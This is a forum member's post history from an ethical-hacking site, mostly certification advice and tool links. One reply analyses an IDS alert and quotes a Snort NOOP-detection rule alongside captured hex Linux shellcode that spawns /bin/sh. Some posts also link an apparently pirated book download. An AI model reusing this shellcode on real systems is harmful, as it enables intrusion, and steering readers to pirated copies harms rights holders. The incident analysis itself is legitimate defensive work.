Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.






Lost Password?
No account yet? Register
Who's Online
We have 48 guests online
 
Advertisement

You are here: Home
EH-Net
May 25, 2013, 03:03:28 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
  Home Help Calendar Login Register  
  Show Posts
Pages: [1]
1  Resources / Tutorials / Visit de-ice.net and start cracking the pentest disks on: December 02, 2007, 11:30:34 PM
Hi All,

If you wish to do some simulation based hacking attempts, please visit de-ice.net and download the pentest disks.

Please note that you have to register before downloading anything from this site.

For more info http://de-ice.net/index.php?name=PNphpBB2&file=index&c=10


Happy hacking!!!
2  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Certification advice on: December 01, 2007, 12:13:50 AM
Hi,

I suggest you to go for OSCP.There is a wonderful review written by blackazarro..
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,1152.msg3741/#msg3741

Hope this helps.
3  Resources / Tools / Re: Opinions on best Network Vulnerability Scanners on: November 29, 2007, 10:30:23 PM
Hi,

I would like you to introduce to a new startup company in India who does On Demand penetration testing.

Have a look at http://www.ivizindia.com/iviz/

4  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Noob!!! on: November 24, 2007, 11:15:04 PM

I just pulled this out my IDS logs: The destination IP is my Windows 2003 IIS server.

alert ip $EXTERNAL_NET any -> $HOME_NET $SHELLCODE_PORTS
  (msg:"SHELLCODE x86 NOOP"; content: "|90 90 90 90 90 90
  90 90 90 90 90 90 90 90|"; depth: 128;
  reference:arachnids,181; classtype:shellcode-detect;
  sid:648; rev:5;)

it contained the following payload:

--snip--
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 31 db 31 c9 31 c0 b0 46 cd 80 89 e5 31 d2 b2 66 89 d0
31 c9 89 cb 43 89 5d f8 43 89 5d f4 4b 89 4d fc 8d 4d f4 cd
80 31 c9 89 45 f4 43 66 89 5d ec 66 c7 45 ee 0f 27 89 4d f0
8d 45 ec 89 45 f8 c6 45 fc 10 89 d0 8d 4d f4 cd 80 89 d0 43
43 cd 80 89 d0 43 cd 80 89 c3 31 c9 b2 3f 89 d0 cd 80 89 d0
41 cd 80 eb 18 5e 89 75 08 31 c0 88 46 07 89 45 0c b0 0b 89
f3 8d 4d 08 8d 55 0c cd 80 e8 e3 ff ff ff 2f 62 69 6e 2f 73
--snip--

What does the hex 0x90 represent?

What is the purpose of the 0x90 in the content?

Based on the information available would you classify this alert as an event to log and ignore or something to be concerned about and to dig into further?

dean



The above hex encoded string is the normal "shellcode" to get a shell. Initial part is filled with "nops" so even if the eip falls anywhere near should reach at the shellcode.
The behaviour of this "sc" is to first set a group id "setgid", then to set session id "setsid". Towards the end it tries to call the "execve" to execute /bin/sh..

Anyway tis was the postmortem report of the small snippet you posted. The last hex byte was missing which should be "68"

This is not a good shellcode..It needs some minor tweakings for successful exploitation and it is not affected to a windows machine [because it is a linux shellcode]

Had some fun in reverse engineering that stuff!!!
5  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Noob!!! on: November 21, 2007, 12:46:04 PM

If you are really motivated to be in the security field, then I suggest you to read fyodor's interview published in slashdot. Refer 4th question and his answer to it. If his answer really motivates you to be "THE ONE", then no one can stop you.

http://interviews.slashdot.org/article.pl?sid=03/05/30/1148235&startat=&threshold=4&mode=nocomment&commentsort=3&op=Change

Happy Reading!!!
6  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Pentesting is scary! on: November 21, 2007, 12:14:11 PM
I agree with what dean has posted.

In every job, there is a risk. And success is with one who is going to take that risk. A penetration test engineer might be having the greater risk as he is involved in identifying the weakness of his client's network. But I suggest to make his role on the safer side by mentioning discliamer's in final report and scopes. Also if you are confident in your assessment, then there is no need to worry. Keep on moving with the next assignment and get engaged for self improvement. This is a profession which requires real professionalism with utmost quality in content and clarity in the data's collected.

There is no situation like "Total Security" as every piece of code is vulnerable to bugs. After all it's a human design and it takes some time to see the vulnerabilities in wild. With the modern sophisticated and complex security produts, vulnerabilities and attack vectors would always be in it's zenith.

As Bruce Schneier said "Security is a process, not a product"!!! And human's are the weakest link to security. So wherever there is a human interaction with a security product, there is a possibility for exploitation. This is one thing all Penetration engineers should know.

"Total security" means when its totally cut off from the network :-)
7  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 21, 2007, 11:32:12 AM
Hi ChrisG,

Second edition of Shellcoder is out. Checkout my previous post. It has a link to pdfchm.com where you can download the book.

8  Resources / Tools / Wifiway (Packet injection from ipw3945 is now possible) on: November 20, 2007, 10:30:11 PM
Hi,

I would like to introduce a security suite called as "wifiway" for those who are interested in wireless audits and penetration testing. This suite does kernel patching which makes it possible for wireless packet injection from an intel wireless card (ipw3945).

For more info http://www.wifiway.org/
You can also see a video hosted at youtube www.youtube.com/watch?v=voyvusZdcn8

Happy war driving!!!
9  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 20, 2007, 10:10:37 PM
I have read the first book "Reversing: Secrets of Reverse Engineering". It is a good one. I have to check the second one.

I would also like to add another good book "The shellcoders Handbook" http://www.pdfchm.com/book/the-shellcoders-handbook-discovering-and-exploiting-security-holes-8882/
10  Resources / Career Central / Re: CISSP Boot Camps in India on: November 20, 2007, 08:58:07 PM
A quick google search gave me these links..Hope it would be useful for you!!!

http://www.google.co.in/search?hl=en&q=CISSP+boot+camps+India&btnG=Google+Search&meta=
11  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 20, 2007, 08:52:18 PM
Hi,

Thanks for all wonderful opinions.
The training offered by Infosec is great but it is not an apt solution for me because I am not US based and it requires travelling which is very expensive :-) for me.

Have anyone heard of online courses offered on advanced penetration testing. I have two such links CBVA (https://www.iitac.org/content/view/132/110/lang,en/) and CRCEP (https://www.iitac.org/content/view/128/110/lang,en/). These courses come from the creators behind DVL and reverse-engineering.net
I would like to here opinions regarding these course and its value!!!


12  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Advice on SCP on: November 20, 2007, 02:21:35 PM
Thanks ChrisG for your valuable advice.

I need to increase my knowledge level and I am looking for the next appropriate certification. I can either move for a vendor based cert or vendor neutral cert. But I am not able to make a final decision on where I should concentrate. I believe certifications wont make you technically competant, but they do give a minimum level in the job market.

I have expirience in conducting penetration tests and vulnerability assessments. This also includes web application testing. Now I am interested in a cert where it focuses on vulnerability research. Can anyone advice me to be on this track??
13  Ethical Hacking Discussions and Related Certifications / General Certification / Re: A+/NETWORK +/SECURITY + on: November 20, 2007, 02:13:20 PM
Hi,

i would like to add the books and tutorials I used for learning Sec+.

1. I used the Testout to learn for Security+ cert . I found it to be really good in  improving my knowledge. It also have an interactive lab where you can really understand how security is implemented in different technologies!!! (For more info, go here http://www.testout.com/securityplus/index.htm)

2. I also used Sybex book to review the contents after learning it from Testout .

3. I also attempted all possible free tests to add my confidence. Among them, I found techexams to be very useful http://www.techexams.net/co_securityplus.shtml. You can visit this during your last preperation days. A great valuable site.

Thats all.. Sec+ exam is easy if you have enough expirience in a security field.

All the best!!!
14  Ethical Hacking Discussions and Related Certifications / General Certification / Advice on SCP on: November 20, 2007, 01:57:47 AM
Hi All,

I would like to know more regarding certifications offered by SCP. Is it really good to take certification offered by SCP? Is this having a market value?

Thanks,
Pages: [1]
Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com
Valid XHTML 1.0! Valid CSS!
Page created in 0.086 seconds with 22 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.